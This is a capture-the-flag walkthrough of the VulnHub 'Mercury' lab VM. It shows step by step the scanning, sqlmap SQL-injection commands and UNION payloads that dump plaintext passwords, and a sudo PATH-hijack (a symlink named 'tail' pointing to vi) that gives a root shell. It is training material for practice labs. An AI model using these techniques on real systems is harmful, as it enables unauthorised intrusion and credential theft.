In this post, I want to walk you through hacking your way into an intentionally vulnerable VM provided by VulnHub and created by user SirFlash. You can see more about this exercise and download your own copy of the .ova file to follow along here. I’ve found that the easiest way to run this VM is with VirtualBox, but you do have to do some specific setup/configuration for the machine to work like we want it to. Because we can’t get into the machine, we can’t really configure very much, so the VirtualBox settings are key.

In addition to VirtualBox, you need a machine to do the penetration test from. Kali Linux is very popular, though I have worked through several of these kinds of exercises with Linux Mint. Kali isn’t meant to be a “daily driver” OS and is just a version of Linux with a lot of tools preinstalled. You can install your favorite tools yourself on any distro that you’d like, or even use another preconfigured one (like Parrot, Black Arch, etc). Many tools are also available on Windows, especially if you have Windows Subsystem for Linux installed and configured. However, if you are ever working through tutorials, walkthroughs, books, videos, or forums, Linux is almost always assumed. There are a lot of resources to get started with Linux and it isn’t nearly as daunting as you’d think.

Just as a note, this machine is in a category called “Capture the Flag” (CTF). This is a fun style of game where you can practice certain skills, techniques, and problem solving abilities. It, however, isn’t necessarily indicative of “real world” penetration tests. My goal is to talk through my thought process as we walk through so you can see how I’m using some of the techniques I’ve learned to operate within the guidelines that CTFs often have. Feel free to just read this through as information, but it is also very fun and beneficial if you can follow along.

I’m starting from the assumption that you’ve already installed VirtualBox, downloaded the Mercury.ova file, and have a machine to attack from.

Getting Started

After you download the Mercury.ova file, open VirtualBox. Click the File menu, and then select Import Appliance
VirtualBox File Import Appliance

Next, you will be prompted to locate the file to import. Make sure your source is “Local File System” and then use the file selector to navigate to where you downloaded the .ova file.
VirtualBox File Import Step Two

Then, you’ll be shown a summary of settings. I was fine with what was here and I clicked Finish.
VirtualBox File Import Step Three

It will do its thing and when it is done, you will see the Mercury VM show up in your list of VMs on the left hand side.
VirtualBox Mercury Fully Imported

Next, with the virtual machine selected, you’ll want to click the orange Settings Gear (1), then select the Network menu (2), choose Host-only Adapter from the Attached to: drop down (3), and click OK (4). This will close the dialog box. Then click the green Start button (5) to start the VM. It is possible that you may not have a Host-only Adapter properly configured. If not – and because these details have changed in the past – just work through this Google Search. We’re doing this as a good way to allow VM to VM communication and that’s all.
Setting the VirtualBox Host Only Adapter

Once you’ve hit the play button, the machine will start up and you’ll see some Linux OS information go by and then the box will finally get to a login prompt. This means you’re ready to go. You can now minimize that window and get ready to work.
Mercury VM Login Prompt

For my environment, I have another VirtualBox VM running Kali, and I changed its network adapter from its normal NAT setting to Host-only for this exercise. I booted that up and logged in. The first thing we need to do is make sure we have netdiscover on our box. Kali is Debian based, so it uses apt to install things by default. I opened a terminal and issued the command sudo apt install netdiscover. I had already entered my sudo password before this, so I wasn’t prompted, but you might be. I also already had this on my box, so your command window may look different during and after the install.
apt install netdiscover

Then, I ran an ifconfig to see what my available network interfaces were. You can see that I have two network interfaces. One is called eth0 and the other is lo. lo is my local loopback interface, so eth0 is the one I want. Yours may be called something different for many reasons, including how you configured your adapters within VirtualBox.
ifconfig results

Next, I ran the command sudo netdiscover -i eth0. That brought up an auto-updating table of hosts discovered on the network attached to that interface (-i eth0). Our goal here is to find out what IP address the Mercury VM is at. If you aren’t sure, you can scan each one, but in this case, I know it is the one located at 192.168.56.101.
Netdiscover Results

That means that it is now time to scan the box. This is our first “this is a CTF, not real life” warning. All of the scans I’m doing here are “noisy”. What that means is that I’m not sneaking around. I’m running these so they take less time from my perspective, which makes them about as intrusive as possible. If I were really doing a penetration test on someone, their monitoring tools would light up. It would be like a criminal pulling up to your house in a loud truck blaring music and wearing jingle bells as they used a battering ram on your front door.

Warning aside, I ran nmap -sC -sV -p- -T4 --min-rate=9326 -vv -oN mercury_nmap.log 192.168.56.101. That command breaks down as follows: I’m using default scripts (-sC), trying to detect versions (-sV), scanning all 65535 ports (-p-), going super fast (-T4, where 5 is the highest/fastest), sending at least 9326 packets per second (--min-rate=9326), asking for very verbose output (-vv), writing the output to a file called mercury_nmap.log (-oN mercury_nmap.log), and lastly scanning 192.168.56.101. Why 9326 packets per second? No real reason that I’m aware of except that someone I was learning from used it once, so I do too.

That scan returned a lot of results, but the main things we learned from it are:

Nmap scan report for 192.168.56.101
Host is up, received conn-refused (0.00054s latency).
Scanned at 2024-03-22 16:11:14 EDT for 96s
Not shown: 65533 closed tcp ports (conn-refused)
PORT     STATE SERVICE    REASON  VERSION
22/tcp   open  ssh        syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http-proxy syn-ack WSGIServer/0.2 CPython/3.8.2

So this machine exposes a web server and has secure shell (SSH) open. My next step is also now built on CTF mentality. I’m assuming that SSH is mid-game in our chess match. I figure I’m supposed to learn something from the web server first that will make the SSH part a little easier. So, I navigated to http://192.168.56.101:8080 and got this.
Mercury's Default Webpage

Sometimes, in CTFs, the developers will leave clues in the Source. In this case, that text is all there is. It isn’t even HTML. So my next step was to use a tool to enumerate the website to try to find directories that aren’t linked to by just “guessing” from curated wordlists and seeing what hits. In this case, I used the command gobuster dir -w /usr/share/wordlists/dirb/common.txt -o mercury_gobuster.log -u http://192.168.56.101:8080. This just used the gobuster program in directory mode (dir) with the wordlist (-w) of common possibilities, outputting (-o) to a log file against the url (-u) of our website. One of the benefits to using a box made for Offensive Security is that they often come with wordlists like this, though you can find them online, download them, and use them wherever you’re working from.
My gobuster results

Well, the only thing we found is a robots.txt. Because we didn’t find anything else, I did try some larger and larger lists, but they also returned only the robots.txt. I guess that means we should check it out.
Robots.txt Contents

Wow. That’s almost amazing in its uselessness. Now, we are at another point where I took a shot. I know a few things: 1) this box is marked as “Easy” and 2) this is a CTF. Some CTFs (especially harder ones) might have an open port with a trail for you to follow and even more work than this, all of it leading to nothing but a waste of time. But, because this is Easy, I wanted to see if causing an error would give us information. Maybe the error page would give us server OS info and we could try an exploit, or it might reveal something else entirely. So, I navigated to http://192.168.56.101:8080/showmea404 in an attempt to see the 404 page.
The Mercury 404 Page

Jackpot. This server is using Django (useful), but even more useful is that it tried to resolve my URL by checking the index (we know about that), the robots.txt (ditto), and a path called mercuryfacts. Hmmmmm, that sounds promising. Let’s navigate to http://192.168.56.101:8080/mercuryfacts
The Mercury Facts Home Page

Here we go! We can load a fact and we can see their Todo List. (The Todo List is the sort of thing that is often left in HTML comments in these). So, I checked the Todo link first and found this
Mercury Facts Todo

Okay, information! We know that either a users table exists or they are using some other (probably poor) means of authentication in the interim. Also, they are making direct mysql calls (I’m smelling some possible SQL injection!). What about that other link? I clicked it and it took me to fact 1. I went back and clicked it again and again, and the fact isn’t random; it’s all a plain GET with the id in the URL and there is no navigation. So, I started just changing the number. First I went to 2 and got another fact, then to 999 and got no fact. Lastly, I tried a fact id of “pete” and that got me an error page (see how we love error pages that leak information!?)
Mercury Facts Enumeration

What we see in that error is that they are taking the value from the URL and sticking it straight into a SQL query. Because we supplied a word and not a number, MySQL thought I was trying to reference a column in the WHERE clause. I don’t need to go any further; I’m going to jump right into sqlmap to try to exploit this. sqlmap is a tool that attempts SQL injection in several different ways. When it works, you can dump databases, get table data, and all kinds of good stuff.
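
Before reaching for sqlmap, you could also sanity-check a numeric injection like this by hand. Here’s a rough sketch of the idea (my own, using only the standard library; the exact string comparison is an assumption, since the page wrapping might differ slightly):

# Crude manual check for numeric SQL injection on the /mercuryfacts/<id> endpoint.
# If "3-1" returns the same fact as "2", the id is probably being evaluated by the database.
import urllib.request

BASE = "http://192.168.56.101:8080/mercuryfacts/"

def fetch(fact_id):
    with urllib.request.urlopen(BASE + fact_id) as resp:
        return resp.read().decode(errors="replace")

baseline = fetch("2")      # the real fact with id 2
arithmetic = fetch("3-1")  # only matches the id 2 fact if SQL evaluates the expression
print("Looks injectable" if baseline == arithmetic else "No obvious injection")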

The first thing I tested was whether or not this would actually work. So, I issued the command sqlmap -u "http://192.168.56.101:8080/mercuryfacts/1" --dbms=mysql --risk=3 --level=5 --technique=U. In this case, the -u is our URL and --dbms tells it which database product to try to hit. We know it’s MySQL from the todos, but sqlmap can also guess if you don’t provide that. The risk and level values are just about the noise we’re willing to make and how hard we want the tool to try. Lastly, --technique=U tells it to use SQL UNION queries in an attempt to exfiltrate the data.
sqlmap initial results

We see that this comes back and the parameter is injectable. This means we can try something else. In this case, I issued the command sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 --dbms=mysql --risk=3 --level=5 --technique=U --tables. That’s very similar except that I added --tables so it would list the tables. We got this:

sqlmap identified the following injection point(s) with a total of 119 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7178717071,0x53574a6856587464485476465941597769575a5a41555270716d78656c466949645264726352434f,0x71766b7171)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: information_schema
[78 tables]
+---------------------------------------+
| ADMINISTRABLE_ROLE_AUTHORIZATIONS     |
| APPLICABLE_ROLES                      |
| CHARACTER_SETS                        |
              -- SNIP -- 
| PROCESSLIST                           |
| TABLES                                |
| TRIGGERS                              |
+---------------------------------------+

Database: mercury
[2 tables]
+---------------------------------------+
| facts                                 |
| users                                 |
+---------------------------------------+

Okay, the first database, information_schema, is just a built-in feature of the DBMS. I --SNIP--'ed a lot of that out of there so you could see it, but let’s not have it clog us up. We care about the mercury db and its two tables: facts and users. If we remember, the Todo list wanted to start using the users table, so we’re very interested. Let’s dump it: sqlmap -u http://192.168.56.101:8080/mercuryfacts/1 --dbms=mysql -D mercury -T users --dump --batch --technique=U --level=5 --risk=3. Our only change this time is to remove the request to list the tables and instead specify the database name (-D mercury) and the table name (-T users), telling it to --dump the contents and to run in --batch mode (no prompts).

sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: http://192.168.56.101:8080/mercuryfacts/1 UNION ALL SELECT CONCAT(0x7162707a71,0x71554a4b637448434261574e63514344716a56734371626a667a586a62507555586a635a4b717549,0x7176786a71)-- -
---
back-end DBMS: MySQL >= 8.0.0
Database: mercury
Table: users
[4 entries]
+----+-------------------------------+-----------+
| id | password                      | username  |
+----+-------------------------------+-----------+
| 1  | johnny1987                    | john      |
| 2  | lovemykids111                 | laura     |
| 3  | lovemybeer111                 | sam       |
| 4  | mercuryisthesizeof0.056Earths | webmaster |
+----+-------------------------------+-----------+

Here we go! We have some usernames and plain text passwords. Now we can try to see what that SSH has got going on! Incidentally, if you examine the results of these scans, it took the tool 119 requests to dump the databases and tables and 49 requests to just get these 4 rows of one table. See what I mean about noisy?

Let’s use the webmaster account to get into the box. It seems like the ranking account. In addition, it has the best password, so I’m guessing it has the juicy stuff. So now we issue the command ssh webmaster@192.168.56.101 and then hit enter. Enter the password and accept the fingerprint as you’re asked and we’re in. The first thing I did was an ls to list the contents of the directory and there is a user_flag.txt right there. I issued a cat user_flag.txt command and we have our user flag!
SSH into Mercury

The thing about CTF boxes is that there is often a User flag and then a Root (or Admin) flag. We’re only half done. Might as well keep exploring. What’s in this mercury_proj directory? To find out, I typed cd mercury_proj/ && ls and saw a notes.txt file. I called cat notes.txt and got 2 users and 2 passwords of some sort. We already know the webmaster password, so if we can work out the encoding or hashing, we might have a shot. At a minimum, this looks like base64 encoding (the == padding at the end of the linuxmaster user’s password is often a giveaway, as = is used as padding in base64). But just because it looks like base64 doesn’t mean that’s the whole answer; encryption will often use base64 as the final step so all of the characters are printable. So, I use the echo command to echo each value and then pipe (|) it into the base64 utility, asking it to --decode. We see that the webmaster password is the one we know, so we can trust that this linuxmaster value is probably their password.
Base64 Encoded Passwords
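
If you prefer Python to piping things through the base64 utility, the same check is a couple of lines. The value below is just the webmaster password we already dumped, standing in for the actual strings from notes.txt:

# Round-trip demo of spotting and decoding base64-encoded credentials.
import base64

encoded = base64.b64encode(b"mercuryisthesizeof0.056Earths").decode()
print(encoded)                             # what a base64'd password looks like (note any '=' padding)
print(base64.b64decode(encoded).decode())  # mercuryisthesizeof0.056Earths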

We can check that immediately by calling su linuxmaster and providing that password. It is accepted and a whoami tells me that I’m now linuxmaster. Is this over now? Is it this easy? We wish! I dug around but didn’t find any other flags, so I’ll spare you those searches.
Changing to Linuxmaster user

That means that our next step is likely privilege escalation. There are a few ways to go, but one of the easiest is to look and see which programs the user can run with sudo, acting as root. Issuing the command sudo -l will tell you just that.
Finding Linuxmaster sudo Permissions

Okay, so we can run a specific bash script as sudo. Oh, that’s good news. Sometimes, we can edit what’s in the file and just do whatever we want. Other times, we can take advantage of something the script calls and exploit the command another way. Let’s see what we’ve got. In the image above, you can see that I followed that up with cat /usr/bin/check_syslog.sh to see what’s in the file. It just calls the Linux tail program to get the last 10 lines out of the /var/log/syslog file. This is actually a common kind of misconfiguration. The /var/log/syslog file needs elevated permissions, or at least very specific permissions, in order to read it. Instead of creating a group and giving that group permission to the file or using access control lists (ACLs), the admin figured they could give this user (and perhaps others) sudo permission on a script that only did one simple thing. But they weren’t expecting this.

Linux (like many operating systems) stores files in directory structures. The most explicit way to call any program is to give its full path every time. We don’t do that. We just want to type ls or cat, not /bin/ls and /bin/cat or /usr/bin/ls and /usr/bin/cat. That’s where the PATH variable comes in. It defines a list of places/directories (in order) that the operating system will look in for the thing you asked for. We can see what that should have been above. When using sudo, it is supposed to ignore your normal PATH and use the secure_path, which in this case for this user was declared as /usr/local/sbin, /usr/local/bin, /usr/sbin, /usr/bin, /sbin, /bin, and /snap/bin.

We’re going to take advantage of this because you also see that we have the env_reset permission when using sudo. That lets us CHANGE where it is willing to look for commands. So, what we’re going to do is create a symlink (think shortcut, of sorts) in our current directory called tail that actually points to /bin/vi. That means whenever the current directory is in the path and someone calls tail, vi will run instead. Some of you who are familiar with vi or vim will know that it can basically run like its own little operating system. So, if I can get this bash script to run as sudo and then open vi, I can then do things within vi as root. Here are the steps:
We actually take advantage of the flaw

In this case, the first thing I do is make sure I’m in my home directory, somewhere I have full permissions, just in case (cd ~). Then I create a symlink (ln -s) named tail that points to /bin/vi, so whenever this directory is searched for the command tail (which is called from within that script), vi is found instead. Next, I update my own PATH variable to be my current directory plus the existing path variable. export PATH means I’m setting that environment variable, and the equals sign means I’m assigning whatever is on the right hand side to the variable. The . is my current directory (where I put the symlink), the : concatenates these values, and $PATH is the current PATH environment variable. So in one sentence, I updated my local PATH environment variable to include what it already had, but put my current directory in first position so it is checked for a command match first.
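
If the PATH lookup order still feels abstract, here’s a tiny self-contained illustration (Python, purely for the demo; on the box itself this was all done with ln -s and export PATH as described above):

# Whichever directory appears first in PATH and contains an executable named
# "tail" wins -- that's the whole trick.
import os
import shutil
import tempfile

with tempfile.TemporaryDirectory() as fake_dir:
    fake_tail = os.path.join(fake_dir, "tail")
    with open(fake_tail, "w") as f:
        f.write("#!/bin/sh\necho 'not the real tail'\n")
    os.chmod(fake_tail, 0o755)

    print(shutil.which("tail"))  # normally /usr/bin/tail
    # Put our directory first, the way export PATH=.:$PATH does on the box
    hijacked = fake_dir + os.pathsep + os.environ.get("PATH", "")
    print(shutil.which("tail", path=hijacked))  # now our fake tail is found first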

The next line in the screenshot is me making a typo; you can ignore it. I left it in to show that I’m human, too 😉 But the correct version of the command is sudo --preserve-env=PATH /usr/bin/check_syslog.sh. I’m calling for the elevated permissions, but then I’m using --preserve-env (because we have the env_reset permission) to use my new PATH environment variable (which includes my local directory) instead of the one carefully defined for me in secure_path. When I hit enter, vi automatically opens.
Our VI Window

If I type :, I’m automatically popped into command mode, and typing shell and hitting enter opens a shell in my current context, which, thanks to the sudo call on the check_syslog.sh file, is root. You can see here that I type whoami and I’m told that I’m root. I issued a cd ~ && ls command to change into root’s home directory and list its contents. I see that there is a root_flag.txt file, and a quick cat root_flag.txt shows us that file’s contents.
We are root and showing the root flag

That’s it. In doing this box, we used the following skills:

  • nmap scan
  • gobuster scan (directory enumeration)
  • Found Error Page misconfiguration
  • Detected and exploited SQLi (SQL Injection)
  • Luck (found additional credentials)
  • symlinks
  • Misconfigured permissions, specifically around sudo and the secure_path variable

Not bad for a day’s work! Next time, I’ll take off my Red Team hat and put on a Blue Team hat to explain how the Administrators could have better protected this file and the sudo permissions (if they insisted on using them at all).